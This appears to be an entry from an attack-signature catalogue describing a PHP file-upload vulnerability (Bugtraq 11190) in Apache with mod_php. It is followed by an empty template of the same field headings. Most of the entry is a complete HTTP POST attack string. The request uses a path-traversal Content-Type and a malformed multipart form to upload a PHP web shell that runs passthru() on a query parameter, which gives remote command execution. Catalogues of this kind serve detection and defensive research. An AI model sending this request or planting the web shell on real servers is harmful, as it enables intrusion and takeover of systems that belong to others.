PHP File Upload

Against

Apache with mod_php on Linux, *BSD, Unix

IDs

Bugtraq: 11190

Effect

Write files as web server user

Source

Bugtraq

Description

No description available

Attack string

POST /star/upload/index.php HTTP/1.1
Host: www.aya.org
Cookie: PHPSESSID=d6f0a5701cb0763befe00c048c59783e; authCookieHash=2a7e0746739844f28941f8b8ae941065; authCookieEmail=aya%40i-pi.com
Content-Type: multipart/form-data; boundary=---------------------------1648318426118446961720965026
Content-Length: 395

-----------------------------1648318426118446961720965026
Content-Disposition: form-data; name="user[file[name]123"; filename="p.php"
Content-Type: ../html/passt.php

<?
passthru($_GET['cm']);
?>

-----------------------------1648318426118446961720965026
Content-Disposition: form-data; name="user[file[type]123"; filename="vg"
Content-Type: application/octet-stream

<?
passthru($_GET['cm']);
?>

Attack program source

None available.

PHP File Upload

Against

IDs

Category

Effect

Source

Description

Attack string

Attack program source